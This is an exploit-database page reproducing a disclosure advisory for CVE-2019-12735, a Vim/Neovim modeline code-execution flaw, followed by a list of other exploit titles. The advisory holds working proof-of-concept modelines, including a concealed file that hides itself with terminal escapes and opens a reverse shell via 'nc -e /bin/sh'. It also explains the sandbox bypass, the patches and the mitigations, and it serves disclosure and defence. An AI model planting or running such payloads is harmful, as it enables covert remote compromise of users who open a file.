Menu

Search for hundreds of thousands of exploits

"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution"

Author

Arminius

Platform

linux

Release date

2019-06-04

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
*by Arminius ([@rawsec](https://twitter.com/rawsec))*

Vim/Neovim Arbitrary Code Execution via Modelines
=================================================

```
Product: Vim < 8.1.1365, Neovim < 0.3.6
Type:    Arbitrary Code Execution
CVE:     CVE-2019-12735
Date:    2019-06-04
Author:  Arminius (@rawsec)
```

Summary
-------

Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code
execution via modelines by opening a specially crafted text file.


Proof of concept
----------------

- Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt):

      :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

- Ensure that the modeline option has not been disabled (`:set modeline`).

- Open the file in Vim:

      $ vim poc.txt

- The system will execute `uname -a`.

Proof of concept 2 (reverse shell)
----------------------------------

This PoC outlines a real-life attack approach in which a reverse shell
is launched once the user opens the file. To conceal the attack, the file will
be immediately rewritten when opened. Also, the PoC uses terminal escape
sequences to hide the modeline when the content is printed with `cat`. (`cat
-v` reveals the actual content.)

[`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt):

    \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n

Demo (victim left, attacker right):

![Reverse shell demo](https://i.imgur.com/8w4tteX.gif)

Details
-------

The modeline feature allows to specify custom editor options near the start or
end of a file. This feature is enabled by default and applied to all file types,
including plain `.txt`. A typical modeline:

    /* vim: set textwidth=80 tabstop=8: */

For security reasons, only a subset of options is permitted in modelines, and
if the option value contains an expression, it is executed in a sandbox: [[1]]

    No other commands than "set" are supported, for security reasons (somebody
    might create a Trojan horse text file with modelines).  And not all options
    can be set.  For some options a flag is set, so that when it's used the
    |sandbox| is effective.

The sandbox is meant to prevent side effects: [[2]]

    The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and
    'foldtext' options may be evaluated in a sandbox.  This means that you are
    protected from these expressions having nasty side effects.  This gives some
    safety for when these options are set from a modeline.

However, the `:source!` command (with the bang [`!`] modifier) can be used to
bypass the sandbox. It reads and executes commands from a given file as if
*typed manually*, running them after the sandbox has been left. [[3]]

    :so[urce]! {file}       Read Vim commands from {file}.  These are commands
                            that are executed from Normal mode, like you type
                            them.

Thus, one can trivially construct a modeline that runs code outside the sandbox:

    # vim: set foldexpr=execute('\:source! some_file'):

An additional step is needed for Neovim which blacklists `execute()`: [[4]]

    execute({command} [, {silent}])                         *execute()*
                    Execute {command} and capture its output.
                    [...]
                    This function is not available in the |sandbox|.

Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]]

    assert_fails({cmd} [, {error} [, {msg}]])               *assert_fails()*
                    Run {cmd} and add an error message to |v:errors| if it does
                    NOT produce an error.

The following modeline utilizes a fold expression to run `source!  %` to
execute the current file, which in turn executes `uname -a || "(garbage)"` as a
shell command:

    :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same
approach via e.g.:

     vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0

(In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).)

Patches
-------

- [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552)
- [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6))

Beyond patching, it's recommended to disable modelines in the vimrc (`set
nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/)
plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow
expressions in modelines.

Timeline
--------

    - 2019-05-22 Vim and Neovim maintainers notified
    - 2019-05-23 Vim patch released
    - 2019-05-29 Neovim patch released
    - 2019-06-05 CVE ID CVE-2019-12735 assigned

Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735).

[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582
[2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050
[3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182
[4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247
[5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494
[6]: https://github.com/vim/vim/releases/tag/v8.1.1365
[7]: https://github.com/neovim/neovim/releases/tag/v0.3.6
Release Date Title Type Platform Author
2019-08-19 "Webmin 1.920 - Remote Code Execution" webapps linux "Fernando A. Lagos B"
2019-08-14 "ABC2MTEX 1.6.1 - Command Line Stack Overflow" dos linux "Carter Yagemann"
2019-08-12 "Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)" remote linux AkkuS
2019-08-12 "Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution" local linux "Etienne Lacoche"
2019-08-12 "Linux - Use-After-Free Reads in show_numa_stats()" dos linux "Google Security Research"
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2018-12-29 "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation" local linux bcoles
2018-12-29 "Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)" local linux bcoles
2018-12-29 "Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)" local linux bcoles
2019-07-24 "Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation" local linux bcoles
2019-07-26 "pdfresurrect 0.15 - Buffer Overflow" dos linux j0lama
2019-07-22 "Axway SecureTransport 5 - Unauthenticated XML Injection" webapps linux "Dominik Penner"
2019-07-22 "Comtrend-AR-5310 - Restricted Shell Escape" local linux "AMRI Amine"
2019-07-19 "Docker - Container Escape" local linux dominikczarnotatob
2019-07-22 "BACnet Stack 0.8.6 - Denial of Service" dos linux mmorillo
2019-07-19 "Web Ofisi Firma 13 - 'oz' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Rent a Car 3 - 'klima' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Firma Rehberi 1 - 'il' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 2 - 'ara' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi E-Ticaret 3 - 'a' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "fuelCMS 1.4.1 - Remote Code Execution" webapps linux 0xd0ff9
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-17 "Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting" webapps linux "Sarath Nair"
2019-07-17 "Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME" local linux "Google Security Research"
Release Date Title Type Platform Author
2019-06-04 "Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution" local linux Arminius
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46973/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/46973/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46973/41384/vim-811365-neovim-036-arbitrary-code-execution/download/", "exploit_id": "46973", "exploit_description": "\"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution\"", "exploit_date": "2019-06-04", "exploit_author": "Arminius", "exploit_type": "local", "exploit_platform": "linux", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse